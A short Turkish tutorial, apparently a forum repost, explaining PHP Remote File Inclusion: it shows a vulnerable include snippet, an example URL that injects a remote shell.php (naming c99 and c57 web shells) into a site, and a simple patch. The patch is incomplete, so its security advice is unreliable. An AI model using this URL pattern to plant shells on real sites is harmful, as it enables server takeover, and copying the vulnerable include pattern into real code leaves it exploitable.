RFİ Açığı
Öncelikle şunu belirteyim Rfi php scriptlerde olan bir açıktır. Rfi açığı genellikle acemi kod yazarlarının değişken tanımlama da yaptıkları küçük hatalar yüzünden oluşur. Rfinin açılımı Remote File İncludedür.
Remote File İnclude = Türkçesi uzaktan dosya ekleme, dahil etme anlamına geliyor.
Aslında Rfi include, include_once, require, require_once kodlarından dolayı oluşuyor. Bu Php kodlarına biraz inceleyelim.
INCLUDE / INCLUDE_ONCE : Bu kodumuz ile yazdığımız uzun kodları bir başka sayfaya aktarıyoruz.
REQUIRE / REQUIRE_ONCE : Bu kodda yukarıda verdiğim include komutunu yerine getirir fakat include komutunda çağırdığınız dosya bulunamadıysa hata verip orayı atlayacaktır ve yorumlayıcı yorumlamaya devam edecektir. Ancak Require komutunda çağrılan dosya bulunamazsa yorumlayıcı hatayı verdikten sonra çalışmayı kesecek yani diğer kısımları yorumlamayacaktır.
Şunu da belirteyim Rfi ataklarında ikisi de aynı oranda işe yararlar.
Rfi Açığı Nasıl Kullanılır?
Rfi açığını kullanmak isteyen hackerlar sistemde bulunmayan bir değişken atar ve açık varsa istenilen değere atarlar. Örneğin c99 shell, c57 shell vs.
Şimdi size göstereceklerimi bir php sunucuda test edebilirsiniz.
İlk olarak bir rfi1.php oluşturalım ve
Kod:
<?php
include ($degisken. '../function.php') ;
?>
Rfi Açığının Kullanım Şekli şöyle.
www.site.com/x.php?degisken=http://www.sitemiz.com/shell.php?
Peki buradaki Rfi açığını nasıl kapatabiliriz?
Gayet basit. Şimdi rfi2.php dosyası oluşturun ve içerisine şu kodları yazın:
Kod:
<?php
$degisken= 'data';
include ($degisken. '../function.php');
?>
www.site.com/x.php?degisken=http://www.sitemiz.com/shell.php?
kodunu yazdığımızda bu sefer başarısız olunur ve sisteme shell sokulamaz. Çünkü sistemde kullandığımız degisken isimli değişkene bir değer verdik ve bu sayede Hackerın buraya değer verip Rfi açığı kullanmasını engelledik.
Not: Alıntıdır ben sadece düzenledim